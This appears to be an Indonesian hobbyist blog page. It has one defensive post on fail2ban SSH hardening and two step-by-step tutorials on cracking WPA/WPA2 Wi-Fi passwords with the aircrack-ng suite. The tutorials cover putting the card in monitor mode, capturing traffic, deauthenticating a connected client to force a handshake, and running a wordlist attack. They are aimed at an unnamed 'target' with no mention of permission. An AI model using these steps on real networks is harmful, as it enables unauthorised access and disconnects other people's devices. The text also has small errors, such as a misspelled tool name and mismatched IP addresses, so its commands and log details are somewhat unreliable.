Ppentest

Mengamankan Server Linux [Tips] Part II | Failban

Failban memiliki fungsi memeriksa log pada /var/log/auth.log atau /var/log/secure untuk mendektesi ada nya ip yang melakukankegiatan yang tidak senonoh :-p . IP si tersangka akan terblock secara otomatis oleh ip tables jika tersangka gagal lokin dalam jangaka waktu beberapa kali 😡

Ubuntu:

sudo apt-get install fail2ban

Centos:

sudo yum install fail2ban

Edit /etc/fail2ban/jail.conf
#si admin nanti di email kalo ada aktifitas yang aneh-aneh
action = %(action_mwl)s

#Konfigurasi untuk SSH. 3000 adalah lamanya (detik) IP hacker itu akan kita block.
[ssh]
enabled = true
port    = ssh
filter  = sshd
logpath  = /var/log/auth.log
maxretry = 3
bantime = 3000
Hasil Kerja Failban
/var/log/fail2ban:
2012-11-03 11:00:46,909 fail2ban.actions: WARNING [ssh] Ban 172.140.150.6
2012-11-03 11:10:47,475 fail2ban.actions: WARNING [ssh] Unban 172.140.150.6
2012-11-04 04:00:53,286 fail2ban.actions: WARNING [ssh] Ban 64.175.229.250
2012-11-04 04:10:53,801 fail2ban.actions: WARNING [ssh] Unban 64.175.229.250

Ip tables nya

Chain fail2ban-ssh (1 references)
target     prot opt source               destination         
DROP       all  --  58.17.36.25         0.0.0.0/0           
DROP       all  --  78.111.96.38         0.0.0.0/0           
RETURN     all  --  0.0.0.0/0            0.0.0.0/0

 


Hi,
The IP 56.17.36.25 has just been banned by Fail2Ban after
3 attempts against ssh.
Here are more information about 56.17.36.115:

					
Standard
./dev/sda /tmp/backtrack, Ppentest

Hack WPA/WP2 |wireless hacking|

1.Ubah Interface jadi monitoring mode

 #airmon-ng start wlan0

2.monitoring target

#airodump-ng -c <channel> –bssid <bssid target> -w psk <interfaces>

3. buka tab baru, monitoring tab nya jangan di tutup

4. PUTUSIN koneksi target :-p

#aireplay-ng –deauth 50 -a <bssid> -c <station id> <interfaces>

Tunggu si target diskonek, sampe si target konek nanti lo dapet handshake nya.

handshake dapet, tinggal eksekusi

#airkrack-ng -w /lokasi/word/lis/nya.txt -b <bssid> psk*.cap

 

note:

-c <channel> lo isi sama chanel si target, kalo lo punya basic wireless networking paham lah yg ini mah

–deauth 50 , nilai 50 bisa lo ganti. maksudnya tu seberapa banyak paket yg dikirim biar si target diskonek.

Os yang di pake backtrack/kali. lo juga bisa pake OS lain nya, yg bin nya .deb /.rpm. tapi mesti install paketan software yang diatas. gw sendiri pake ubuntu sama fedora security.

tanda handshake udah dapet, liat di terminal yang lagi memonitoring, nanti ada tulisan handshake nya.

 

 

Semoga berhasil

Standard
./dev/sda /tmp/backtrack, Ppentest

crack wifi

Tool.

  1. PC linux mw binary .deb / .rpm suka-suka lo.
  2. Aircrack-ng, airmon-ng,aireplay-ng,airodump-ng.
  3. Wireless buat nangkep wifi nya.

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
keterangan: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis
                   pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
keterangan: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket
                  handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
keterangan : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt

source “http://forum.electronicglobal.com/t80-tutorial-cracking-password-hotspot-wpa-psk-dengan-linux-backtrack&#8221;

Standard